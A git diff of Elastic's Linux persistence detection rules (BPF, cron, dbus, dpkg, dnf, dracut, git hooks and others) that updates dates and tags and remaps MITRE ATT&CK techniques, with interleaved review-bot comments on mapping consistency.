-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1542"
+name = "Pre-OS Boot"
+reference = "https://attack.mitre.org/techniques/T1542/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/persistence_bpf_probe_write_user.toml b/rules/linux/persistence_bpf_probe_write_user.toml
index 7e66f75cc0d..000429e62b0 100644
--- a/rules/linux/persistence_bpf_probe_write_user.toml
+++ b/rules/linux/persistence_bpf_probe_write_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/28"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -76,14 +76,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst
 - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
 query = '''
@@ -93,23 +86,6 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1547"
-name = "Boot or Logon Autostart Execution"
-reference = "https://attack.mitre.org/techniques/T1547/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.006"
-name = "Kernel Modules and Extensions"
-reference = "https://attack.mitre.org/techniques/T1547/006/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1014"
 name = "Rootkit"
diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml
index af4757fbc16..7f6ca634f5e 100644
--- a/rules/linux/persistence_bpf_program_or_map_load.toml
+++ b/rules/linux/persistence_bpf_program_or_map_load.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/20"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -62,20 +62,7 @@ references = [
 risk_score = 47
 rule_id = "2d05fefd-40ba-43ae-af0c-3c25e86b54f1"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Threat: Rootkit",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Auditd Manager",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Rootkit", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -91,24 +78,6 @@ process.name == "bpftool" and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1547"
-name = "Boot or Logon Autostart Execution"
-reference = "https://attack.mitre.org/techniques/T1547/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.006"
-name = "Kernel Modules and Extensions"
-reference = "https://attack.mitre.org/techniques/T1547/006/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1014"
 name = "Rootkit"
diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml
index 554ad767f59..564eb7dc63f 100644
--- a/rules/linux/persistence_chkconfig_service_add.toml
+++ b/rules/linux/persistence_chkconfig_service_add.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/22"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -196,6 +196,11 @@ id = "T1037"
 name = "Boot or Logon Initialization Scripts"
 reference = "https://attack.mitre.org/techniques/T1037/"
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
index 523302ed1a5..6d78f771a3b 100644
--- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
+++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -145,17 +145,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit
 - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Persistence",
- "Tactic: Lateral Movement",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
 query = '''
@@ -182,19 +172,6 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
@@ -209,26 +186,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1021.004"
-name = "SSH"
-reference = "https://attack.mitre.org/techniques/T1021/004/"
-
-[[rule.threat.technique]]
-id = "T1563"
-name = "Remote Service Session Hijacking"
-reference = "https://attack.mitre.org/techniques/T1563/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1563.001"
-name = "SSH Hijacking"
-reference = "https://attack.mitre.org/techniques/T1563/001/"
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml
index 752d0925262..3b65170c93f 100644
--- a/rules/linux/persistence_cron_job_creation.toml
+++ b/rules/linux/persistence_cron_job_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
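Review bot: The rebuilt third `[[rule.threat]]` entry reuses T1556 (Modify Authentication Process), so this rule now carries the same technique under both Credential Access and Persistence, which makes the two entries redundant from a coverage-reporting point of view. For a rule about modified `ssh`/`sshd` binaries, ATT&CK's T1554 (Compromise Host Software Binary, a Persistence technique) is the closer fit for the backdoored-binary case and keeps the two entries distinct; the change is limited to the second technique block: `id = "T1554"`, `name = "Compromise Host Software Binary"`, `reference = "https://attack.mitre.org/techniques/T1554/"`. If T1556 is intentionally kept under both tactics, a sentence in the rule description saying why would stop the next cleanup pass from collapsing them.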
@@ -164,16 +164,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -227,27 +218,9 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -263,6 +236,6 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_dbus_service_creation.toml b/rules/linux/persistence_dbus_service_creation.toml index 386571da585..82ce58f171f 100644 
--- a/rules/linux/persistence_dbus_service_creation.toml +++ b/rules/linux/persistence_dbus_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -134,9 +134,9 @@ file.extension in ("service", "conf") and file.path like ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" @@ -147,9 +147,9 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml index 6d9c71de08e..dc908e15502 100644 --- a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml +++ b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -79,18 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -123,40 +112,9 @@ process.parent.name == "dbus-daemon" and process.args_count > 1 and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml index 10ca2105f97..f6f393dd312 100644 --- a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
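Review bot: After this hunk the rule carries a single Execution mapping (T1559 under TA0002) while the file keeps its `persistence_` prefix and the tags hunk above leaves `Tactic: Execution` as the only tactic tag, so the filename and the mapping now disagree; if anything in the repository derives grouping or naming from that prefix, this is the rule most likely to surprise. The replacement also silently drops T1059.004 Unix Shell, which the surviving query context (`process.parent.name == "dbus-daemon" and process.args_count > 1`) still looks relevant to, so a sentence in the rule explaining why Inter-Process Communication is the better fit would make the change defensible later. The `[rule.threat.tactic]` table this hunk ends on continues outside the hunk.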
@@ -87,17 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -129,21 +119,6 @@ file.path like ("/usr/lib/python*/site-packages/dnf-plugins/*", "/etc/dnf/plugin [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -153,11 +128,3 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml index 595ab2d545a..509d2fcb489 100644 
--- a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml +++ b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -98,11 +91,6 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -113,11 +101,6 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" 
@@ -127,20 +110,19 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_dpkg_unusual_execution.toml b/rules/linux/persistence_dpkg_unusual_execution.toml index 73a6322b954..41b46686434 100644 --- a/rules/linux/persistence_dpkg_unusual_execution.toml +++ b/rules/linux/persistence_dpkg_unusual_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
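Review bot: The first hunk removes the blank line that separated the tactic table from `[rule.new_terms]` (the lone `-` just before `+id = "TA0004"`), so `reference = "https://attack.mitre.org/tactics/TA0004/"` is now immediately followed by `[rule.new_terms]`; every other table boundary in these files keeps one blank line, so restoring it keeps the formatting uniform. Separately, this rule and persistence_dpkg_unusual_execution.toml now each carry T1546.016 under Persistence and again under Privilege Escalation with identical technique and subtechnique tables, which is valid TOML and a valid ATT&CK placement but is pure duplication apart from the tactic — acceptable only if that is the repository's convention for multi-tactic techniques.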
@@ -78,14 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +105,6 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -131,16 +114,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" [rule.threat.tactic] -name = "Initial Access" -id = "TA0001" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/linux/persistence_dracut_module_creation.toml b/rules/linux/persistence_dracut_module_creation.toml index 9427236d5fb..d0e21bd892a 100644 --- a/rules/linux/persistence_dracut_module_creation.toml +++ b/rules/linux/persistence_dracut_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,18 +76,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -128,43 +117,7 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml index 2dcef6e4fb8..93e45dc6fa5 100644 --- a/rules/linux/persistence_dynamic_linker_backup.toml +++ b/rules/linux/persistence_dynamic_linker_backup.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/12" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/17" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -153,16 +153,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Threat: Orbit", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Orbit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id with maxspan=1m @@ -192,3 +183,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_extract_initramfs_via_cpio.toml b/rules/linux/persistence_extract_initramfs_via_cpio.toml index 3116b612026..e22479339de 100644 --- a/rules/linux/persistence_extract_initramfs_via_cpio.toml +++ b/rules/linux/persistence_extract_initramfs_via_cpio.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -122,16 +122,6 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml index 55473220b03..2406032af88 100644 --- a/rules/linux/persistence_git_hook_execution.toml +++ b/rules/linux/persistence_git_hook_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,18 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] type = "eql" query = ''' sequence by host.id with maxspan=3s 
@@ -109,24 +98,6 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -145,7 +116,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_git_hook_file_creation.toml b/rules/linux/persistence_git_hook_file_creation.toml index c5b9d78a19a..10d5c0ad0dd 100644 --- a/rules/linux/persistence_git_hook_file_creation.toml +++ b/rules/linux/persistence_git_hook_file_creation.toml @@ -2,7 +2,7 @@ creation_date = 